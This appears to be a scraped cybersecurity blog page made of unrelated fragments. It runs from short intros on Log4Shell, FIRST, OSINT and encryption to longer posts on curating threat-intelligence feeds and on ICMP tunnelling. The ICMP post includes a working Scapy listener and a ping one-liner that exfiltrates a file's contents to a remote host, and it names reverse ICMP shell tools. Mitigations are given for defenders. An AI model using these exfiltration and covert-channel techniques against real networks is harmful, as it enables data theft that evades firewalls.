Context of the Log4Shell Vulnerability to Text4Shell
A year ago, the infamous “Log4Shell” vulnerability on the Log4J logging library of the Apache Logging Services was disclosed. This “Remote Code Execution” (RCE) vulnerability was widely publicized, as the component was widely used and exploiting of the vulnerability was easy. Indeed, Log4Shell was more than just an RCE vulnerability. Depending on the way it was exploited, it could also be used for data exfiltration via protocols such as DNS.
The number of vulnerabilities is growing day by day due to different technologies such Web applications or Cloud Computing, which is increasingly adopted by organizations as well as teleworking, so more assets are exposed and connected to the internet and the attack surface of organizations is getting more and more larger, besides hackers have shifted their focus from high to medium and low CVSS.
FIRST is the Forum of Incident Response and Security Teams. Since 1990, when FIRST was founded, its members have resolved an almost continuous stream of security-related attacks and incidents including handling thousands of security vulnerabilities affecting nearly all of the millions of computer systems and networks throughout the world connected by the ever growing Internet.
FIRST brings together a wide variety of security and incident response teams including especially product security teams from the government, commercial, and academic sectors.
TLP means Traffic Light Protocol, it is a protocol created by the Special Interest Group of FIRST (FIRST TLP SIG).
Today’s Context about Covid and Teleworking. How is it going ?
Remote working is here to stay, requiring companies to maintain their efforts to combat cyber-attacks. Companies are now requesting security solutions to accommodate this new level of flexibility. To adapt to a changing world, some are embracing to hybrid work, while others are opting for full-time telecommuting. The goal is the same: to transparently improve workers’ working conditions regardless of their location.
If having unrestricted access to a customer’s IT assets is an integral part of a service provider’s business, it leaves them vulnerable. By offering comprehensive PAM solutions, distributors will be able to secure, manage and monitor access to their own and their customers’ privileged accounts, keeping their network’s most valuable keys safe.
OSINT stands for Open-Source Intelligence, which is one of the key aspects of understanding cybersecurity. It is a piece of information collected from public sources such as those available on the Internet, although the term is not strictly limited to the Internet, but rather refers to all publicly available sources.
Format Preserving Encryption, named FPE from here, is a particular form of encryption with a constraint of preserving the initial format. In other words, the output should keep the same format as the input. The format of data can be defined by a charset (named the domain in the article below) and a length. Here are some examples:
A 16-digit card number in a 16-digit number.
A 12 Hexadecimal digit mac address in a 12 Hex digit number.
In today’s article, we discuss the background of threat intelligence feeds.
Cyber Threat Intelligence (CTI) is stream-based detection of cyber threats, including network anomaly indicators. But this is just the tip of the CTI iceberg, the one consumed by SIEM (Security Information and Event Management) appliances.
It is essential to understand the need to prepare or curate CTI.
At CERT-XLM, we actively refine our CTI feeds. This paper discusses the importance of having usable feeds and how CERT-XLM achieves this..
What is a cyber threat intelligence feed?
Intelligence feeds contain indicators related to an identified or possible threat. CTI indicators are called IoCs (Indicator of Compromise) or IoAs (Indicators of Attack). An IoC is an indicator of a network security breach. They are used to identify malware signatures, known IP addresses or domains, and exploitation of vulnerable products/versions to reactively detect the compromise. An IoA recognizes the intention of attackers as well as suspicious activities that could lead to attacker persistence or lateral movements.
Indicators can be an IP address related to delivering malware, IP addresses corresponding to an attacker’s control servers (hereafter referred to as “C2”), URLs of phishing web pages, names or hashes of malicious files, email addresses, and so on.
Where to get your own cyber threat intelligence feed?
The market for CTI intelligence sources is not consistent. Security solutions such as anti-virus, firewalls, or proxy solutions can include proprietary CTI.
Virus Total [VT], Vx-underground [VX], or Abuse.ch [Abuse.ch] are open or public CTI sources that allow the downloading of a variety of samples or IOCs. These platforms are sometimes crowd-sourced with URLs or files submitted by users worldwide.
Platforms such as PhishTank [PhishTank] or OpenPhish [OpenPhish] allow users to report malicious sites that seek to extract user credentials or other sensitive information.
You can create your own CTI platform, which gathers and stores feeds that are relevant to you; this is what CERT-XLM does.
Some feeds are dedicated to one threat, such as OpenPhish for phishing or a particular family of malware for Abuse.ch. In contrast, others offer a wide variety of known threats, such as Malware Information Sharing Platform (MISP).
“Label all the things!”
The name of a threat is essential information for an analyst. There is no universal CTI naming convention, and each major vendor applies its own. For example, “Emotet” can be found under the name “Feodo,” “Heodo,” or “Geodo .”The Stealer “Pony” may be labelled “Siplog” or “Fareit”. QakBot is also called “Pinkslipbot,” “QBot,” and “Quakbot.”
There are common categories for indicators like “C2”, “phishing”, “malware”, “RAT”, “ransomware”, “scanner”, and “botnet”. Unfortunately, the categories are not universal. The MISP community platform has the concept of “galaxies”,, which each member can define. The result is multiple indicators associated with the same threat.
The CERT-XLM uniformly labels all threats based on MISP classification standards. Our curated CTI is then applied consistently through SIEM Use Cases.
Don’t lose control over your Cyber Threat Intelligence Feeds
Low-quality CTI feeds result in low-quality indicators.
Here is an example of a low-quality CTI indicator due to URL formatting issues:
Here is an example of a low-quality CTI indicator due to a content issue as it contains an RFC 1918 reserved IP address:
On line 2, the domain is protected by brackets, a common practice but left to individual preferences: one can also find square brackets instead, “hxxp” for “HTTP”.
CERT-XLM thoroughly tests, decodes, reencodes each indicator, and cleans and discards irrelevant ones.
Come on and grab your own!
Generic CTI content can result in the high volume creation of false positives.
Looking at the four examples below:
This example is a well-known content hosting service. This service can be abused, but without the exact page qualification path, the domain itself is not malicious.
It is common for attackers to use free online services to host malicious documents. They then invite their victims to download and open them as part of a phishing campaign to avoid detection. Without the identifier (e.g., hxxps://forms.office.com/r/ne89GVwrYE), this is not an indicator of a threat.
is an internal IP address. It corresponds to countless domains: Not all of these domains are malicious, and the analyst doing reverse DNS research on it must be able to classify the alert.
is a less common example. This CTI content will generate a lot of alerts in most environments.
CERT-XLM takes extra precautions to avoid CTI content that generates a high volume of false positive alerts.
Adapting your cyber threat intelligence feed to your SIEMs capabilities
It is important to have Secure Socket Layer (SSL) decryption as part of your security architecture. Your SIEM will have less useful information if you do not have adequate SSL decryption. Only the visited domains will be recorded.
Your SIEM may also have software limitations. The first limitation could be the number of indicators it can ingest at one time. Other limitations will come from the functionalities of the SIEM, as none of them is perfect.
Unfortunately for some SIEMs, no alert will be raised with a visit to the URL https://walletsdappvalidation.com/ when the indicator is “https://walletsdappvalidation.com/?u” as only exact matches are possible.
Test, test and test again
It is essential to validate your CTI content.
CERT-XLM measures CTI content in an isolated environment to reduce the risk of incidents from establishing connections with the indicators.
We then evaluate:
how redundant the indicators are with the flows we already have. Measuring indicator matches things being blocked by your firewalls, proxies, anti-viruses, and other perimeter security solutions in your environment.
What proportion of these indicators will generate false positives? This can be measured offline by looking for the indicators in the extraction of your traffic.
How much reprocessing is required before ingestion by the SIEM? If there is no SSL termination in your traffic, at a minimum, you will need to extract domains from URLs. You will need to think of strategies to counter false positives as described above. Reprocessing will also involve cleaning up some of the recoverable indicators as described in Section 2.2.
What is the proportion of waste? This involves looking for unusable indicators, as described in paragraph 3, to which you can add those that generate false positives.
Only these quantifiable answers will allow you to conclude whether the feed is worthwhile.
CERT-XLM also recommends the use of a passive DNS database. This approach can allow extended searches to be performed without consuming DSIEM resources. If matches are identified, a short period search in the SIEM will allow concluding with the full indicator if it is a false-positive or true-positive.
Cyber threat intelligence feeds: what to conclude?
There are a lot of details to keep in mind when integrating CTI content with a SIEM. This is why CERT-XLM recommends applying a structured approach to curating CTI content.
The ping command is one of the first commands you learned when coming to the IT world. And yet, it is possible that it is still hiding secrets from you.
Through this blog post, I will demonstrate how attackers could use the protocol behind this command to bypass firewall rules leading to data exfiltration or communication with a command and control.
How does the Internet Control Message Protocol (ICMP) work ?
The ping command use the Internet Control Message Protocol (ICMP) which is a supporting protocol in the Internet protocol suite.
It is used by network devices, including routers, to send error messages and operational information indicating success or failure when communicating with another IP address for example. An error is indicated when a requested service is not available or if that a host could not be reached.
In fact, when you use the ping command, two types of control messages are used:
The type 0 which is an Echo Reply.
The type 8 which is an Echo Request
From the RFC792 which defines ICMP for IPv4, the fields for an echo or reply message are the following :
As an attacker, the data field is the one useful to communicate. In a usual case of pinging, the data received in the echo request message must be returned in the echo reply message. That’s how we know that a remote host is reachable.
An In-depth examination of the topic
Let’s see an example, below is a ping initiated from a Windows machine.
Figure 1 – Ping initiated from Windows machine
The ping is successful and from the output, two values should be noticed :
The TTL (Time To Live) value which could be used to help you identify the kind of OS of the remote machine. For a TTL value <= 64, it’s usually a Unix based OS.
The bytes value which is the length of the data, in this case the data is 32 bytes long.
Analysing the same ping using Wireshark showed that each echo request from my Windows machine sends the alphabet by default. As expected, the same data is returned by the remote Linux machine.
Figure 2 – Windows ping analysis
However sending the alphabet is not mandatory. In fact, the ICMP protocol allows sending any data as we want.
To prove it, let’s initiate a ping from the Linux machine this time. By default the Windows host firewall deny the ICMP Echo Request IN so the according rule should be open.
Figure 3 – Ping initiated from Linux machine
This time we can notice that the TTL value is <= 128. This indicates a reply from a Windows machine.
Analysing the ping showed the alphabet is not sent anymore and the data is longer than 32 bytes.
Figure 4 – Linux ping analysis
However, 48 bytes are still far from the maximum allowed. Indeed, because ICMP is built on top of the IP layer, in its version 4, the maximum size allowed by these packets is 65535 bytes. Removing the headers of IP (20 bytes at least) and ICMP (8 bytes), it is possible to have 65507 bytes of ICMP data.
But if we assume the maximum transmission unit is set to 1500 (which is the default for ethernet), the maximum payload without fragmentation is limited to 1472 bytes (1500 – 20 -8). In case of fragmentation, the server should be able to handle multiple icmp requests and add their data together.
A Simple Proof of Concept (PoC)
As shown in the previous experience, we can communicate different data with different lengths through ICMP request and reply. Knowing that, we could exfiltrate the content of a file or performed commands send by a command and control server using ICMP.
However, to do this, we first need to disable ICMP replies from our attacker server by running the following command as root :
sysctl -w net.ipv4.icmp_echo_ignore_all=1
Otherwise, the client is unlikely to receive commands send from the server because automatic replies will send back the same data.
Once the command done, pinging from our Windows machine now print a request timed out because no data is returned.
Figure 5 – Request timed out because no reply received
Analysing from the Linux machine showed the communication is one-way.
Figure 6 – ICMP automatic replies disabled
Let’s craft a simple Proof of Concept to exfiltrate a file content based on ICMP request. To do this, a very useful python library named Scapy was used.
Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more.
On the server side, this simple script which should be run as root will just listen for ICMP on the wire. For each packet received, it will run the exfiltration function which parse and collect the last 4 bytes of the ICMP data using the load method.
from scapy.all import ICMP,sniffinterface = “eth0”
remote_host = “192.168.23.138”def exfiltration(packet):
if packet[ICMP].type == 8:
data = packet[ICMP].load[-4:]
print(data. Decode(‘utf-8’), flush=True, end=””)sniff(iface=interface, filter=”icmp and host “+remote_host, store=True, prn=exfiltration)
Client side, on a Linux machine, we could exfiltrate a file using this simple command :
xxd -p -c 4 test.txt | while read line; do ping -c 1 -p $line 192.168.23.139; done
Where test.txt is the file we want to exfiltrate. Notice this is very long because the data is sent 4 bytes by 4 bytes, the -p option of the default ping binary allow up to 16 bytes.
Otherwise we could also use Python and Scapy to send data more rapidly by crafting our ICMP packets.
Finally, if we were on a Windows machine, the native ping binary has no options to custom the icmp data. We could run a crafted exe but there is usually fewer restrictions regarding companies policies on PowerShell which allows to perform this customisation like in the tool Invoke-PowerShellIcmp.ps1.
Discover a Suite of Complete Tools to get an ICMP shell
The previous PoC is not optimised because it is a one-way communication and all the data bytes available for the protocol were not used. This leads me to introduce a suite of complete tools which exploit fully the ICMP protocol in a form of a shell.
First, Icmpsh which is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python2. It does not require administrative privileges to run onto the target machine but an executable should be dropped on the machine, which can be hard to do in case of endpoint hardening for example. Furthermore, Invoke-PowerShellIcmp.ps1 is a client compatible with icmpsh and could be more easily dropped on the client machine.
Next, icmpdoor is a shell written with Python3 and Scapy, it comes with an executable to run it directly on Windows.
Below is an example of the above tool running. From the Linux C2 machine, I’m able to run command on the Windows target machine, through ICMP.
Figure 7 – Connect to the C2 from the victim machine
Figure 8 – Running commands through ICMP tunnelling from the C2
How to mitigate ?
You should now ask yourself how mitigate this. Well, there is a radical option which consists to block ICMP traffic and so ICMP tunnelling. But in practice, many companies don’t want to lose the ping functionality that is very useful in many situations for debugging purposes.
Another way to mitigate this type of attack is to only allow fixed sized ICMP packets through firewalls, which can impede this kind of behavior. But again, an attacker could craft ICMP packets with a length which look like legitimate (e.g 32 bytes of data).
The best answer, in my opinion, is to disable ICMP outgoing traffic and enable ICMP traffic inside only where it is necessary. Furthermore, defenders should monitor carefully on the wire for suspect behaviors such as ICMP request without default value as data.
Privacy & Cookies Policy
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics the number of visitors, bounce rate, traffic source, etc.
Microsoft Clarity set this cookie to store information about how visitors interact with the website. The cookie helps to provide an analysis report. The data collection includes the number of visitors, where they visit the website, and the pages visited.
YouTube sets this cookie via embedded youtube-videos and registers anonymous statistical data.
This cookie, set by Bing, is used to collect user information for analytics purposes.
Microsoft Clarity cookie set this cookie for synchronizing the MUID across Microsoft domains.
Microsoft Clarity sets this cookie to retain the browser's Clarity User ID and settings exclusive to that website. This guarantees that actions taken during subsequent visits to the same website will be linked to the same user ID.
Microsoft Clarity sets this cookie to store and consolidate a user's pageviews into a single session recording.